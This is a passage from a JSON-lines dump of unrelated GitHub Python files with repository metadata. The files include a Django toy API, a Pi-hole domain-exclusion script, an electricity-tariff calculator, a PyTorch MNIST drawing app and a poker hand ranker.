handle(self):\n\n\t\tjobvar_data=self.__task.data.get('jobvar')\n\t\tprint(\"Showing the info of subjob variables for task %s:\"%str(self.__task.data['id']))\n\n\t\tmode=self.__task.data['scenario']['param']['splitter'].get('mode')\n\t\tif mode not in ['splitByJobvar', 'splitByJobvars']:\n\t\t\tprint(\"Command invalid because splitter mode for the task is not splitByJobvars\")\n\t\t\treturn 0\n\n\t\tif (self.__sub_id is not None) and (self.__jobvar is None):\n\t\t\t#print the jobvar sets for the subjob\n\t\t\ttry:\n\t\t\t\tjobvars_this_subjob = jobvar_data[self.__sub_id]\n\t\t\t\tprint(\"The value of subjob variables for subjob %d are as following:\"%int(self.__sub_id))\n\t\t\t\tfor jobvar in jobvars_this_subjob:\n\t\t\t\t\tprint(\"%s: %s\"%(jobvar,jobvars_this_subjob[jobvar]))\n\t\t\texcept:\n\t\t\t\tprint(\"Can't get variables for subjob %d, bad index?\"%int(self.__sub_id))\n\n\t\tif (self.__sub_id is None):\n\t\t\tif self.__jobvar is None: # print the list of jobvars\n\t\t\t\ttry:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvarLists']\n\t\t\t\texcept:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvar_lists']\n\t\t\t\tif jobvar_info is None:\n\t\t\t\t\tprint('There is no info for any jobvar.')\n\t\t\t\telse:\n\t\t\t\t\tlen_count=0\n\t\t\t\t\tvar_count=0\n\t\t\t\t\tprint(\"There're following jobvar lists:\")\n\t\t\t\t\tfor key in jobvar_info:\n\t\t\t\t\t\tprint('%s'%key)\n\t\t\t\t\t\tvar_count+=1\n\t\t\t\t\t\tlen_count=len(jobvar_info[key])\n\t\t\t\t\tprint(\"\")\t\t\n\t\t\t\t\tprint(\"There're %s jobvar lists, each with a length of %s. You can use -i, -j parameters to check their values\"%(var_count, len_count))\n\t\t\t\t\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvarLists'].get(self.__jobvar)\n\t\t\t\texcept:\n\t\t\t\t\tjobvar_info=self.__task.data['scenario']['param']['splitter']['jobvar_lists'].get(self.__jobvar)\n\n\t\t\t\tif jobvar_info is None:\n\t\t\t\t\tprint('There is no info for jobvar %s.'%self.__jobvar)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Parameters of jobvar list %s are as following:\"%self.__jobvar)\n\t\t\t\t\tfor key in jobvar_info:\n\t\t\t\t\t\tprint('%s: %s'%(key, jobvar_info[key]))\n\t\t\t\t\tprint(\"\")\t\t\n\n\t\t\t\t\t# put attributes in jobvar_info to jobvar_info['param']; to simplify user definition\n\t\t\t\t\tparam=jobvar_info.get('param',{})\n\t\t\t\t\tjobvar_info_wo_param={k:v for k,v in jobvar_info.items() if k!='param'}\n\t\t\t\t\tif 'param' not in jobvar_info:\n\t\t\t\t\t\tjobvar_info['param']={}\n\t\t\t\t\tjobvar_info['param'].update(jobvar_info_wo_param)\n\t\t\t\t\t# loading jobvar and generate list\n\t\t\t\t\tprint(\"Indexes and values for this jobvar list are:\")\n\t\t\t\t\tjobvar_instance=self.__ext_mgr.load_ext_common('jobvar',jobvar_info)\n\t\t\t\t\tcycle=0\n\t\t\t\t\tcycle_end=False\n\t\t\t\t\twhile cycle self.max_items:\n with open(self.history_file_location, 'w') as new_history_file:\n new_history_file.writelines([item + '\\n' for item in count[:self.max_items]])\n return True\n except IOError:\n return IOError('Failed to open the history file')\n","repo_name":"amr3k/araneus","sub_path":"Araneus/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71779792256","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.renderers import JSONRenderer\n\nfrom toyss.models import Toy\nfrom toyss.serializers import ToySerializer\n\n\n# Create your views here.\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef toy_list(request):\n \"\"\"\n If the request is a GET, we return a list of all the toys in the database. If the request is a POST, we create a\n new toy in the database\n\n :param request: The request object is an HttpRequest object. It contains metadata about the request, including the\n HTTP method.\n :return: The HttpResponse object is an object that contains the content that will be returned to the\n browser\n \"\"\"\n\n if request.method == 'GET':\n toys = Toy.objects.all()\n serializer = ToySerializer(toys, many=True)\n return JSONResponse(serializer.data)\n\n elif request.method == 'POST':\n toy_data = JSONParser().parse(request)\n toy_serializer = ToySerializer(data=request.data)\n if toy_serializer.is_valid():\n toy_serializer.save()\n return JSONResponse(toy_serializer.data, status=201)\n return JSONResponse(toy_serializer.errors, status=400)\n\n return HttpResponse(status=405)\n\n\n@csrf_exempt\n@api_view(['GET', 'PUT', 'DELETE'])\ndef toy_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a toy.\n\n :param request: The request object is an HttpRequest object. It contains metadata about the request, including the HTTP\n method:\n :param pk: The primary key of the toy that we want to retrieve, update or delete\n :return: The HttpResponse object is an object that contains the content that will be returned to the browser\n \"\"\"\n\n try:\n toy = Toy.objects.get(pk=pk)\n except Toy.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = ToySerializer(toy)\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = ToySerializer(toy, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n toy.delete()\n return HttpResponse(status=204)\n\n return HttpResponse(status=405)\n","repo_name":"bumahkib7/Django-toy","sub_path":"toyss/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38539161320","text":"from customer import Customer\nfrom food import Food\nfrom menu import Menu\nfrom mon import dbase\n\nmenu1 = Menu(dbase())\n\norders = []\npizza = Food('pizza', 15, 100)\nburger = Food('burger', 10, 50)\n\nmenu1.add_food([pizza, burger])\n\nmenu1.display()\n\ncust1 = Customer('shreya')\ncust2 = Customer('riya')\n\norders.extend(cust1.order([pizza]))\norders.extend(cust2.order([pizza, burger]))\n\nprint(cust1.bill)\nprint(cust2.bill)\n\n","repo_name":"ShreyaKarmakar/MyRestaurant","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23966890719","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('order', '0002_auto_20141007_2032'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='first_name',\n field=models.CharField(max_length=150, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='order',\n name='last_name',\n field=models.CharField(max_length=150, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/oscar_apps/order/migrations/0003_auto_20181024_1555.py","file_name":"0003_auto_20181024_1555.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"17846901309","text":"#!/usr/bin/env python\n\nimport os\nimport re\nimport argparse\n\nclass Renamer:\n def __init__(self, dir, pattern):\n self.dir = dir\n self.pattern = pattern\n\n def rename_files(self):\n files = os.listdir(self.dir)\n for file in files:\n match = re.match(self.pattern, file)\n if match:\n old_path = os.path.join(self.dir, file)\n new_name = match.group(1) + '.pyc'\n new_path = os.path.join(self.dir, new_name)\n os.rename(old_path, new_path)\n print(f'Renamed {old_path} to {new_path}')\n\ndef rename_files(dir, pattern=r'^(\\w+)\\.cpython-\\d+\\.pyc$'):\n renamer = Renamer(dir, pattern)\n renamer.rename_files()\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Rename pyc files')\n parser.add_argument('dir', metavar='dir', type=str, help='the directory containing the pyc files')\n parser.add_argument('--pattern', metavar='pat', type=str, default=r'^(\\w+)\\.cpython-\\d+\\.pyc$', help='the regular expression pattern to match the pyc filenames')\n args = parser.parse_args()\n rename_files(args.dir, args.pattern)\n","repo_name":"jy3736/pyprog2023s-week04","sub_path":"lib/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21218541932","text":"from lib.postgres_connector import PostgresConnector\nfrom lib.repository import (\n EmpresasValoresInputadosRepository,\n ValorTarifasRepository,\n ValorBandeirasRepository,\n ValorImpostosRepository\n)\n\n\nclass Controller:\n def __init__(self, company_name, reference_date):\n \"\"\"\n Classe que realiza todos os cálculos para as colunas da tabela empresas_valores_calculados.\n É chamada sempre passando na entrada os dados de uma empresa, em um mês, ou seja, quase\n uma linha do banco.\n\n Com esses dados ela busca os demais dados da empresa no banco, e usa eles pra realizar\n os calculos necessários.\n \"\"\"\n self.company_name = company_name\n self.reference_date = reference_date\n\n def execute(self):\n db_connection = PostgresConnector().connect_using_localhost_credentials()\n\n with db_connection as pg_conn:\n empresas_repository = EmpresasValoresInputadosRepository(pg_conn)\n tarifas_repository = ValorTarifasRepository(pg_conn)\n bandeiras_repository = ValorBandeirasRepository(pg_conn)\n impostos_repository = ValorImpostosRepository(pg_conn)\n\n company_month_data = self._get_company_month_data(empresas_repository)\n company_params = self._get_company_params(company_month_data)\n\n print(f\"company_month_data: {company_month_data}\")\n print(f\"company_params: {company_params}\")\n\n # Calculos daqui pra baixo #\n tusde_p_and_fp_reais = self._calculate_tusd_energia_reais(\n company_month_data, company_params, tarifas_repository\n )\n\n energia_cativo_p_and_fp_reais = self._calculate_energia_cativo_reais(\n company_month_data, company_params, tarifas_repository\n )\n\n\n # def _calculate_sobras_and_ultrapassagem_reais(self, empresas_repository):\n # self._calculate_sobras_and_ultrapassagem_kw(empresas_repository)\n\n # def _calculate_sobras_and_ultrapassagem_kw(self, empresas_repository):\n # \"\"\"\n # Pega os dados da empresa e mês em questão,\n # e aí calcula:\n # - IF MODALIDADE = AZUL, calcula Sobra e Ultrapassagem na Ponta, e tbm FP\n # - Se for VERDE, apenas fora da ponta\n #\n # Precisa dos valores de demanda_contratada minima e max, pra ponta e fp. isso por\n # sua vez precisa ser feito com base nas regras desse slide>\n # https://docs.google.com/presentation/d/1xU6kjrg1Zz1NQm2152Rc4whT6MZ1byOAuWRYb5i1DV8/edit#slide=id.gadad5d60d2_0_87\n # \"\"\"\n # company_data = self._get_company_month_data(empresas_repository)\n #\n # sobra_p_kw = 0,\n # sobra_fp_kw = 0\n #\n # if company_data[\"modalidade\"] == \"Azul\":\n # sobra_p_kw = dem_contratada_min_p - dem_medida_p\n # sobra_fp_kw = 2*(dem_contratada_min_fp - dem_medida_fp)\n #\n # ultrapassagem_p_kw = dem_contratada_max_fp - dem_medida_p\n # ultrapassagem_fp_kw = 2*(dem_contratada_max_fp - dem_medida_fp)\n #\n # return {\n # \"sobra_p_kw\": sobra_p_kw,\n # \"sobra_fp_kw\": sobra_fp_kw,\n # \"ultrapassagem_p_kw\": ultrapassagem_p_kw,\n # \"ultrapassagem_fp_kw\": ultrapassagem_fp_kw,\n # }\n\n def _calculate_demanda_max_e_min(self, company_month_data, empresas_repository):\n \"\"\"\n - Demanda mínima:\n Ex:\n [Mês | dem contratada | periodo teste? | Dem mín | Justificativa ]\n [1 | 30 | FALSE | 30 | É a mesma da contratada, pq não é período de teste]\n [2 | 75 | TRUE | 30 | É a do último mês antes de ser teste ]\n [3 | 75 | TRUE | 30 | Como a do mês 2 é igual a desse mês, a demanda min ainda é a do mês anterior ao teste]\n [4 | 90 | TRUE | 75 | Como a do mês 3 é DIFERENTE a desse mês, a demanda min passa a ser do mês anterior]\n\n Ou seja:\n - if periodo de testes:\n -> demanda minima é igual a demanda contratada do ultimo mês com troca\n - else = demanda contratada\n\n - Demanda MÁXIMA FP:\n - Se não for período de teste, é = demanda contratada*1,05\n - Se for, é a demanda contratada atual*1,05 + 0,3*(diferença entre demanda contratada ATUAL e a ANTERIOR/ref)\n \"\"\"\n is_teste_p = company_month_data[\"is_teste_ponta\"]\n is_teste_fp = company_month_data[\"is_teste_fora_ponta\"]\n\n # Demanda Fora Ponta #\n if not is_teste_fp:\n demanda_min_fp = company_month_data[\"demanda_contratada_fora_ponta\"]\n demanda_max_fp = demanda_min_fp*1.05\n\n else:\n demanda_contratada_ref = empresas_repository.get_latest_register_with_changes_on_demanda_contratada(\n tipo_dem_contratada=\"Fora Ponta\"\n )\n demanda_contratada_atual = company_month_data[\"demanda_contratada_fora_ponta\"]\n\n demanda_min_fp = demanda_contratada_ref[\"demanda_contratada_fora_ponta\"]\n demanda_max_fp = (demanda_contratada_atual * 1.05) + (demanda_contratada_atual - demanda_contratada_ref)*0.3\n\n # Demanda Ponta #\n if not is_teste_p:\n demanda_min_p = company_month_data[\"demanda_contratada_ponta\"]\n demanda_max_fp = demanda_min_p * 1.05\n\n else:\n demanda_contratada_ref = empresas_repository.get_latest_register_with_changes_on_demanda_contratada(\n tipo_dem_contratada=\"Ponta\"\n )\n demanda_contratada_atual = company_month_data[\"demanda_contratada_ponta\"]\n\n demanda_min_p = demanda_contratada_ref[\"demanda_contratada_ponta\"]\n demanda_max_p = (demanda_contratada_atual * 1.05) + (demanda_contratada_atual - demanda_contratada_ref)*0.3\n\n return {\n \"demanda_min_fp\": demanda_min_fp,\n \"demanda_max_fp\": demanda_max_fp,\n \"demanda_min_p\": demanda_min_p,\n \"demanda_max_p\": demanda_max_p,\n }\n\n def _calculate_tusd_energia_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n \"\"\"\n Calcula TUSD energia pra ponta e fp.\n \"\"\"\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n tusd_energia_p = tarifas_month_data_p[\"tusde\"]\n tusd_energia_fp = tarifas_month_data_fp[\"tusde\"]\n\n consumo_p = company_month_data[\"consumo_ponta\"]\n consumo_fp = company_month_data[\"consumo_fora_ponta\"]\n\n tusd_energia_p_reais = consumo_p*tusd_energia_p\n tusd_energia_fp_reais = consumo_fp*tusd_energia_fp\n\n return {\n \"tusd_energia_p_reais\": tusd_energia_p_reais,\n \"tusd_energia_fp_reais\": tusd_energia_fp_reais\n }\n\n def _calculate_energia_cativo_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n te_p = tarifas_month_data_p[\"te\"]\n te_fp = tarifas_month_data_fp[\"te\"]\n\n consumo_p = company_month_data[\"consumo_ponta\"]\n consumo_fp = company_month_data[\"consumo_fora_ponta\"]\n\n energia_cativo_p_reais = consumo_p*te_p\n energia_cativo_fp_reais = consumo_fp*te_fp\n\n return {\n \"energia_cativo_p_reais\": energia_cativo_p_reais,\n \"energia_cativo_fp_reais\": energia_cativo_fp_reais\n }\n\n def _calculate_energia_reat_exc_reais(\n self, company_month_data, company_params, tarifas_repository\n ):\n tarifas_month_data_p = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Ponta\"\n )\n\n tarifas_month_data_fp = self._get_fares_month_data(\n tarifas_repository, company_params, posto=\"Fora Ponta\"\n )\n\n tu_p = tarifas_month_data_p[\"tu\"]\n tu_fp = tarifas_month_data_fp[\"tu\"]\n\n ener_reat_exc_p = company_month_data[\"ener_reat_exced_ponta\"]\n ener_reat_exc_fp = company_month_data[\"ener_reat_exced_fora_ponta\"]\n\n ener_reat_exc_p_reais = ener_reat_exc_p*tu_p\n ener_reat_exc_fp_reais = ener_reat_exc_fp*tu_fp\n\n return {\n \"ener_reat_exc_p_reais\": ener_reat_exc_p_reais,\n \"ener_reat_exc_fp_reais\": ener_reat_exc_fp_reais\n }\n\n def _get_company_month_data(self, empresas_repository):\n return empresas_repository.get_data_using_company_and_reference_date(\n reference_date=self.reference_date, company_name=self.company_name\n )\n \n @staticmethod\n def _get_company_params(company_month_data):\n return {\n \"reference_date\": company_month_data[\"data_referencia\"],\n \"fornecedora\": company_month_data[\"fornecedora\"],\n \"modalidade\": company_month_data[\"modalidade\"],\n \"subgrupo\": company_month_data[\"subgrupo\"],\n } if company_month_data else \"NÃO HÁ DADOS DESSA EMPRESA, FAÇA UM NOVO REQUEST!\"\n\n @staticmethod\n def _get_fares_month_data(tarifas_repository, company_params, posto):\n company_params.update({\"posto\": posto})\n\n print(\" \")\n print(\"Tarifas repository::\")\n print(tarifas_repository.get_fares(\n input_params=company_params\n )\n)\n\n return tarifas_repository.get_fares(\n input_params=company_params\n )\n\n\nif __name__ == '__main__':\n Controller(\n company_name=\"Teste\",\n reference_date=\"01-01-2020\"\n ).execute()","repo_name":"arthurtuio/gide-flask-api","sub_path":"motor_calculo/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30086772529","text":"import sys\r\ninput = sys.stdin.readline\r\nsys.setrecursionlimit(1000000)\r\n\r\ndef dfs(idx):\r\n for i in visited[idx]:\r\n if not parents[i]:\r\n parents[i] = idx\r\n dfs(i)\r\n\r\n\r\n# 노드의 개수\r\ncnt_node = int(input())\r\n# 자식인덱스에 부모 노드 저장할 리스트\r\nparents = [0] * (cnt_node + 1)\r\n# 간선의 수 = 노드의 개수 - 1 만큼 저장\r\nvisited = [[] for _ in range(cnt_node + 1)]\r\nfor _ in range(cnt_node - 1):\r\n i, j = map(int, input().split())\r\n visited[i].append(j)\r\n visited[j].append(i)\r\n\r\ndfs(1)\r\n\r\nfor idx in range(2, cnt_node + 1):\r\n print(parents[idx])","repo_name":"chahyeoncheol/BAEKJOON","sub_path":"백준/Silver/11725. 트리의 부모 찾기/트리의 부모 찾기.py","file_name":"트리의 부모 찾기.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41687295305","text":"# encoding utf-8\n# created: 03 May 2022 - Duaine Alderman\n\n\nimport pathlib\nimport sqlite3\n\n# Store the query here for ease of use\nSQL_QUERY = \"\"\"SELECT domain FROM queries WHERE CLIENT IN ({}) GROUP BY DOMAIN;\"\"\"\n\n# The hardcoded text that starts the exclusion lines in the conf file\nAPI_DOMAIN_LINE = \"API_EXCLUDE_DOMAINS=\"\nAPI_CLIENT_LINE = \"API_EXCLUDE_CLIENTS=\"\n\n\nclass PiHoleDomainFilter():\n def __init__(self):\n # SQL\n self.sql_connection = None\n self.sql_cursor = None\n\n # Filter storage\n self.filter_domains = set()\n self.filter_clients = set()\n\n # Files\n self.setup_file = pathlib.Path('/etc/pihole/setupVars.conf')\n self.backup_file = pathlib.Path('/etc/pihole/setupVars.conf.bak')\n\n # Execute the script now\n try:\n self.backup_settings()\n self.fetch_sql()\n self.rebuild_settings()\n except:\n print(\"Exception raised, closing connection...\")\n # Close the connection if possible in case we hit ANY error\n if self.sql_connection:\n self.sql_connection.close()\n\n def backup_settings(self):\n \"\"\"\n Backup the settings file to ensure that if anything happens we will have a restore point.\n\n :return: None\n \"\"\"\n\n print('Backing up settings file...')\n with open(self.setup_file, 'r') as orig_file:\n with open(self.backup_file, 'w') as out_file:\n for file_line in orig_file:\n # Get the already filtered domains\n if API_DOMAIN_LINE in file_line:\n self.filter_domains = {item.replace('\\n', '') for item in file_line.split(API_DOMAIN_LINE)[1].split(',')}\n # Get the clients that control what we add to the filter\n elif API_CLIENT_LINE in file_line:\n self.filter_clients = {f\"'{item.strip()}'\" for item in file_line.split(API_CLIENT_LINE)[1].split(',')}\n out_file.write(file_line)\n\n def fetch_sql(self):\n \"\"\"\n Fetch the needed domains from the Sqlite3 database (assuming standard install locations for\n Pi-Hole at this time) using the provided exclusion client IPs.\n\n :return: None\n \"\"\"\n\n print('Fetching information from SQL...')\n self.sql_connection = sqlite3.connect(\"/etc/pihole/pihole-FTL.db\")\n self.sql_cursor = self.sql_connection.cursor()\n self.sql_cursor.execute(SQL_QUERY.format(\",\".join(self.filter_clients)))\n sql_results = self.sql_cursor.fetchall()\n for item in sql_results:\n self.filter_domains.add(str(item[0]))\n self.sql_connection.close()\n\n def rebuild_settings(self):\n \"\"\"\n Rebuilds the settings file based upon the backup file, the stored filter information, and\n the new information parsed from the Sqlite3 DB file.\n\n The backup file is only opened for reading and will not be modified in any way. Only the\n original file will be changed.\n\n :return: None\n \"\"\"\n\n print('Rebuilding settings file from SQL...')\n with open(self.backup_file, 'r') as backup_file:\n with open(self.setup_file, 'w') as out_file:\n for file_line in backup_file:\n # Get the already filtered domains\n if API_DOMAIN_LINE in file_line:\n file_line = f\"{API_DOMAIN_LINE}{','.join(self.filter_domains)}\"\n file_line += '\\n'\n out_file.write(file_line)\n\n\nif __name__ == '__main__':\n PiHoleDomainFilter()\n","repo_name":"aldermde027/Pihole-Domain-Filter","sub_path":"pihole_domain_filter.py","file_name":"pihole_domain_filter.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72303557054","text":"import sublime\n\n\nclass ProgressBar:\n \"\"\"\n Show a message in the status bar\n \"\"\"\n\n def __init__(self, label, width=10):\n self.label = label\n self.width = width\n\n def start(self):\n self.done = False\n self.update()\n\n def stop(self):\n sublime.status_message(\"\")\n self.done = True\n\n def update(self, status=0):\n if self.done:\n return\n status = status % (2 * self.width)\n before = min(status, (2 * self.width) - status)\n after = self.width - before\n sublime.status_message(\"%s [%s=%s]\" % (\n self.label, \" \" * before, \" \" * after))\n sublime.set_timeout(lambda: self.update(status + 1), 100)\n","repo_name":"gepd/Deviot","sub_path":"libraries/progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"79"} +{"seq_id":"20488922543","text":"import tkinter as tk\n\nimport torch\nfrom PIL import Image, ImageDraw\nfrom torch import nn\nfrom torchvision import transforms\n\n\n# import numpy as np\n\n\nclass Window:\n def __init__(self):\n window = tk.Tk()\n window.title('MNIST')\n window.geometry('500x300') # window size\n window['bg'] = 'gray' # background color\n window.attributes(\"-alpha\", 0.95) # diaphaneity\n\n self.model_init()\n\n label = tk.Label(window, text='请在画板上画出数字,并点击“识别”按钮识别数字', font=('Arial', 10))\n label.pack()\n\n # hand-drawing canvas\n self.canvas = tk.Canvas(window, bg='black', width=200, height=200)\n self.canvas.pack()\n self.canvas.bind('', self.onLeftButtonDown)\n self.canvas.bind('', self.onLeftButtonMove)\n self.canvas.bind('', self.onLeftButtonUp)\n\n # button recognize\n btn_p = tk.Button(window, text=\"识别\", font=('Arial', 10), width=10, height=2,\n command=lambda: self.predict(self.canvas, window))\n btn_p.pack()\n btn_p.place(x=100, y=230)\n\n # button clear\n btn_c = tk.Button(window, text=\"清空\", font=(\n 'Arial', 10), width=10, height=2, command=self.clear)\n btn_c.pack()\n btn_c.place(x=310, y=230)\n\n # PIL image draw\n self.image = Image.new(\"RGB\", (200, 200), (0, 0, 0))\n self.draw = ImageDraw.Draw(self.image)\n\n # bottom status bar\n self.statusbar = tk.Label(\n window, text=\"\", bd=1, relief=tk.SUNKEN, anchor=tk.W)\n self.statusbar.pack(side=tk.BOTTOM, fill=tk.X)\n\n window.mainloop()\n\n def model_init(self):\n # self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.device = torch.device('cuda')\n # net = Net().to(device)\n self.model = torch.load('model/mnist_cnn.pth')\n self.model.to(self.device)\n self.model.eval()\n print('model loading complete.')\n\n def onLeftButtonDown(self, event):\n self.lastx, self.lasty = event.x, event.y\n self.statusbar.config(text='btn down')\n print('btn down...')\n\n def onLeftButtonMove(self, event):\n self.canvas.create_line(self.lastx, self.lasty,\n event.x, event.y, fill='white', width=8)\n self.draw.line([self.lastx, self.lasty, event.x,\n event.y], (255, 255, 255), width=10)\n self.lastx, self.lasty = event.x, event.y\n self.statusbar.config(text='x:{}, y:{}'.format(event.x, event.y))\n print(event.x, event.y)\n\n def onLeftButtonUp(self, event):\n self.lastx, self.lasty = 0, 0\n print('btn up')\n\n def predict(self, canvas, window):\n # self.image.save('canvas.jpg')\n image = self.image.resize((28, 28))\n image = image.convert('L')\n # image = np.expand_dims(image, 0)\n # image = np.array(image)\n # image = torch.Tensor(image)\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n image = transform(image)\n # image = Variable(torch.unsqueeze(\n # image, dim=0).float(), requires_grad=False)\n image.unsqueeze_(0)\n image = image.to(self.device)\n output = self.model(image)\n # find index of max prob\n pred = output.max(1, keepdim=True)[1]\n num = pred.cpu().numpy()[0][0]\n self.statusbar.config(text='predict num:' + str(num))\n print('predict:' + str(num))\n\n def clear(self):\n # clear canvas\n self.canvas.delete(tk.ALL)\n self.image = Image.new(\"RGB\", (200, 200), (0, 0, 0))\n self.draw = ImageDraw.Draw(self.image)\n\n\nclass Net(nn.Module):\n \"\"\"\n customized neural network\n \"\"\"\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 6, kernel_size=5, padding=2)\n self.conv2 = nn.Conv2d(6, 16, kernel_size=5)\n self.conv3 = nn.Conv2d(16, 120, kernel_size=5)\n self.maxpool = nn.MaxPool2d(2)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.fc2 = nn.Linear(84, 10)\n self.softmax = nn.LogSoftmax(dim=1) # log to solve value overflow\n\n def forward(self, x):\n # block1\n out = self.conv1(x)\n out = self.maxpool(out)\n out = self.relu(out)\n\n # block2\n out = self.conv2(out)\n out = self.maxpool(out)\n out = self.relu(out)\n\n # block3\n out = self.conv3(out)\n out = self.relu(out)\n\n # block4\n out = out.view(x.size(0), -1)\n out = self.fc1(out)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.softmax(out)\n\n return out\n\n\nif __name__ == \"__main__\":\n window = Window()\n","repo_name":"ivanwhaf/DL","sub_path":"mnist_ui.py","file_name":"mnist_ui.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"929644544","text":"#input: adn(str)\n#output: ci(str) es la cadena complementaria expresada de manera inversa\n#ci = complemento inverso\nadn = input(\"ADN: \")\nadn = adn.upper()\nci= \"\"\nfor i in range(len(adn)-1,-1,-1):\n if adn[i]==\"A\":\n ci = ci + \"T\"\n if adn[i]==\"T\":\n ci = ci+\"A\"\n if adn[i]==\"G\":\n ci =ci +\"C\"\n if adn[i]==\"C\":\n ci = ci +\"G\"\nprint(\"Cadena inicial: \",adn)\nprint(\"Cadena replicada: \",ci)\n","repo_name":"ZaphPie/PC-casa","sub_path":"python/CICLO 2022-0/CICLO VERANO/Strings/Funciones básicas/ejemplo8_lab_s10.py","file_name":"ejemplo8_lab_s10.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16334099022","text":"# A famous casino is suddenly faced with a sharp decline of their revenues.\n# They decide to offer Texas hold'em also online. \n# Can you help them by writing an algorithm that can rank poker hands?\n\nclass PokerHand(object):\n\n #RESULT = [\"Loss\", \"Tie\", \"Win\"]\n\n def __init__(self, hand):\n # Hand preprocessing\n self.hand = hand.split(\" \")\n for pos, card in enumerate(self.hand):\n if card[0] == \"T\":\n self.hand[pos] = card.replace(\"T\", \"10\")\n elif card[0] == \"J\":\n self.hand[pos] = card.replace(\"J\", \"11\")\n elif card[0] == \"Q\":\n self.hand[pos] = card.replace(\"Q\", \"12\")\n elif card[0] == \"K\":\n self.hand[pos] = card.replace(\"K\", \"13\")\n elif card[0] == \"A\":\n self.hand[pos] = card.replace(\"A\", \"14\")\n \n # Creating dictionary.\n self.dictionary = {}\n self.suit_list = []\n self.number_list = []\n for idx in range(5):\n self.suit_list.append(self.hand[idx][-1])\n self.number_list.append(int(self.hand[idx][:-1]))\n self.dictionary['suit'] = self.suit_list\n self.dictionary['numbers'] = self.number_list\n # Count repetitions of numbers in the hand.\n self.rnum = [self.dictionary['numbers'].count(i) for i in self.dictionary['numbers']]\n # Count repetitions of suits in the hand.\n self.rsuits = [self.dictionary['suit'].count(i) for i in self.dictionary['suit']]\n # The difference between the greater and the smallest number in the hand.\n self.dif = max(self.dictionary['numbers']) - min(self.dictionary['numbers']) \n \n # Auxilary function that helps to find the highest solo card.\n def highest_card(self):\n solo_cards = []\n self.solo_card_score = 0\n for card in range(2, 15):\n if self.dictionary['numbers'].count(card) == 1:\n solo_cards.append(card)\n for idx in range(1, len(solo_cards) + 1):\n self.solo_card_score += round((((15 - sorted(solo_cards)[-idx]) / idx ** 3) / 100), 5)\n return self.solo_card_score \n \n def combination_search(self):\n # Search for combination and score it.\n self.combination = \"\"\n self.score = 0\n # Additional 